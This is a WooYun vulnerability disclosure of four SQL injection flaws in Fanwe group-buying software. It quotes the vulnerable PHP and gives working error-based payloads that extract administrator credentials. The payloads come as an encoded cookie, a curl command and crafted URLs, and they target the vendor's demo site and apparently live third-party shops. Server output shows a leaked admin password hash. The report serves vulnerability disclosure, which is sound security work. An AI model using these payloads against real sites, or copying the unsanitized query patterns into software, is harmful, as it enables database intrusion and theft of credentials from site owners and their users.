当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-087824

漏洞标题:方维团购最新版本4个sql注射打包

相关厂商:fanwe.com

漏洞作者: loopx9

提交时间:2014-12-23 18:59

修复时间:2015-04-02 10:23

公开时间:2015-04-02 10:23

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-23: 细节已通知厂商并且等待厂商处理中
2014-12-28: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2015-02-21: 细节向核心白帽子及相关领域专家公开
2015-03-03: 细节向普通白帽子公开
2015-03-13: 细节向实习白帽子公开
2015-04-02: 细节向公众公开

简要描述:

测试最新版本4.3.

详细说明:

注入点1: app\source\user_init.php:

...
//开始自动登录 by hc
if($_SESSION['user_id'] == 0 && isset($_COOKIE['email']) && isset($_COOKIE['password'])) //cookie传入
{
$cookie_user['email'] = trim(unserialize(base64_decode($_COOKIE['email']))); //没有过滤,base64编码,不受GPC限制
$cookie_user['user_pwd'] = trim(unserialize(base64_decode($_COOKIE['password'])));
$userinfo = $GLOBALS['db']->getRow("SELECT `id`,`user_name`,`user_pwd`,`status`,`group_id`,`city_id`,`parent_id` FROM ".DB_PREFIX."user WHERE email='".$cookie_user['email']."' and user_pwd='".$cookie_user['user_pwd']."'");
//进入查询
...


注入点2: app\source\goods_list.php:

...
if ($_REQUEST ['m'] == 'Goods' && $_REQUEST ['a'] == 'showByUname') {
$uname = addslashes($_REQUEST['uname']);
if($uname!='')
{
$uname = rawurldecode($uname); //addslashes 和rawurldecode 顺序反了,url编码可绕过addslashes,不受GPC限制
$sql ="select id from ".DB_PREFIX."goods where u_name='".$uname."'"; //拼接参数
$goods_id =intval($GLOBALS['db']->getOneCached($sql)); //进入查询
}
}
...


注入点3: app\source\index_malllist.php:

...
if ($_REQUEST ['m'] == 'Index' && $_REQUEST ['a'] == 'unSubScribe') {
//退订
$email = trim(urldecode($_REQUEST['email'])); //同前一个注入,url编码bypass GPC
$sql = "delete from " . DB_PREFIX . "mail_address_list where mail_address = '{$email}'"; //拼接语句
if ($GLOBALS ['db']->query ( $sql )) { //进入查询
success(a_L ( "SUBSCRIBEBACK_SUCCESS" ),'',a_u("Index/index"));
} else {
a_error(a_L ( "SUBSCRIBEBACK_FAILED" ),'',a_u("Index/index"));
}
exit;
}
...


注入点4: mapi\fanwe.php:

error_reporting(E_ALL ^ E_NOTICE);
$i_type = 0;//上传数据格式类型; 0:base64;1;REQUEST;2:json
//r_type: 返回数据格式类型; 0:base64;1;json_encode;2:array
if (isset($_REQUEST['i_type']))
{
$i_type = intval($_REQUEST['i_type']);
}
if ($i_type == 1){
$requestData = $_REQUEST;
}else{
if (isset($_REQUEST['requestData'])){
if ($i_type == 2){
$requestData = json_decode(trim($_REQUEST['requestData']), 1);
}else{
$requestData = base64_decode(trim($_REQUEST['requestData'])); //base64解码
$requestData = json_decode($requestData, 1); //json解码,跟进$requestData
}
}else{
$requestData = $_REQUEST;
}
}
...

$keyword = trim($requestData['keyword']); //$keyword没有过滤
if ($keyword && $keyword <> ''){
$sql .= " and (g.name_1 like '%$keyword%' )"; //参数拼接
$sql_count .= " and (g.name_1 like '%$keyword%' )";
}

$sql .= " group by g.id order by g.sort desc,g.id desc";
$sql_count .= " order by g.sort desc,g.id desc";
$sql.=" limit ".$limit;
$list = $GLOBALS['db']->getAll($sql); //进入查询
$total = $GLOBALS['db']->getOne($sql_count);
...

漏洞证明:

官方演示站点测试: http://t1.fanwe.net:93/t1/ admin表: t1_admin
注入点1: 序列化payload,然后再base64编码:

s:191:"'AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT SUBSTRING(CONCAT(adm_name,0x7c,adm_pwd,0x7c),1,60) FROM t1_admin LIMIT 0,1),FLOOR(RAND(0)*2))X FROM information_schema.tables GROUP BY X)a)#";


编辑cookie添加email和password然后访问/index.php
email=czoxOTE6IidBTkQgKFNFTEVDVCAxIEZST00oU0VMRUNUIENPVU5UKCopLENPTkNBVCgoU0VMRUNUIFNVQlNUUklORyhDT05DQVQoYWRtX25hbWUsMHg3YyxhZG1fcHdkLDB4N2MpLDEsNjApIEZST00gdDFfYWRtaW4gTElNSVQgMCwxKSxGTE9PUihSQU5EKDApKjIpKVggRlJPTSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIEdST1VQIEJZIFgpYSkjIjs=; password=0;


curl -b "email=czoxOTE6IidBTkQgKFNFTEVDVCAxIEZST00oU0VMRUNUIENPVU5UKCopLENPTkNBVCgoU0VMRUNUIFNVQlNUUklORyhDT05DQVQoYWRtX25hbWUsMHg3YyxhZG1fcHdkLDB4N2MpLDEsNjApIEZST00gdDFfYWRtaW4gTElNSVQgMCwxKSxGTE9PUihSQU5EKDApKjIpKVggRlJPTSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIEdST1VQIEJZIFgpYSkjIjs=; password=0;" http://t1.fanwe.net:93/t1/
<b>MySQL server error report:Array
(
[0] => Array
(
[message] => MySQL Query Error
)
[1] => Array
(
[sql] => SELECT `id`,`user_name`,`user_pwd`,`status`,`group_id`,`city_id`,`parent_id` FROM t1_user WHERE email=''AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT SUBSTRING(CONCAT(adm_name,0x7c,adm_pwd,0x7c),1,60) FROM t1_admin LIMIT 0,1),FLOOR(RAND(0)*2))X FROM information_schema.tables GROUP BY X)a)#' and user_pwd=''
)
[2] => Array
(
[error] => Duplicate entry 'fanwe|6714ccb93be0fda4e51f206b91b46358|1' for key 'group_key'
)
[3] => Array
(
[errno] => 1062
)
)

1.png


http://www.tl19tuan.com/

2.png


注入点2:

http://t1.fanwe.net:93/t1/index.php?m=Goods&a=showByUname&uname=%2527%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT((SELECT%20SUBSTRING(CONCAT(adm_name,0x7c,adm_pwd,0x7c),1,60)%20FROM%20t1_admin%20LIMIT%200,1),FLOOR(RAND(0)*2))X%20FROM%20information_schema.tables%20GROUP%20BY%20X)a)%23

3.png


注入点3:

http://t1.fanwe.net:93/t1/index.php?m=Index&a=unSubScribe&email=%2527%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT((SELECT%20SUBSTRING(CONCAT(adm_name,0x7c,adm_pwd,0x7c),1,60)%20FROM%20t1_admin%20LIMIT%200,1),FLOOR(RAND(0)*2))X%20FROM%20information_schema.tables%20GROUP%20BY%20X)a)%23

4.png


注入点4: payload json_encode再base64编码:

http://t1.fanwe.net:93/t1/mapi/index.php?requestData=eyJrZXl3b3JkIjoiJykgQU5EIChTRUxFQ1QgMSBGUk9NKFNFTEVDVCBDT1VOVCgqKSxDT05DQVQoKFNFTEVDVCBTVUJTVFJJTkcoQ09OQ0FUKGFkbV9uYW1lLDB4N2MsYWRtX3B3ZCwweDdjKSwxLDYwKSBGUk9NIHQxX2FkbWluIExJTUlUIDAsMSksRkxPT1IoUkFORCgwKSoyKSlYIEZST00gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyBHUk9VUCBCWSBYKWEpIyIsImFjdCI6Im5lYXJieWdvb2RzZXMifQ==

5.png


http://www.tl19tuan.com/mapi/index.php?requestData=eyJrZXl3b3JkIjoiJykgQU5EIChTRUxFQ1QgMSBGUk9NKFNFTEVDVCBDT1VOVCgqKSxDT05DQVQoKFNFTEVDVCBTVUJTVFJJTkcoQ09OQ0FUKHVzZXIoKSwweDdjLHZlcnNpb24oKSwweDdjKSwxLDYwKSksRkxPT1IoUkFORCgwKSoyKSlYIEZST00gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyBHUk9VUCBCWSBYKWEpIyIsImFjdCI6Im5lYXJieWdvb2RzZXMifQ==

6.png

http://www.pt916.com/mapi/index.php?requestData=eyJrZXl3b3JkIjoiJykgQU5EIChTRUxFQ1QgMSBGUk9NKFNFTEVDVCBDT1VOVCgqKSxDT05DQVQoKFNFTEVDVCBTVUJTVFJJTkcoQ09OQ0FUKHVzZXIoKSwweDdjLHZlcnNpb24oKSwweDdjKSwxLDYwKSksRkxPT1IoUkFORCgwKSoyKSlYIEZST00gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyBHUk9VUCBCWSBYKWEpIyIsImFjdCI6Im5lYXJieWdvb2RzZXMifQ==

7.png

修复方案:

过滤.

版权声明:转载请注明来源 loopx9@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-04-02 10:23

厂商回复:

最新状态:

暂无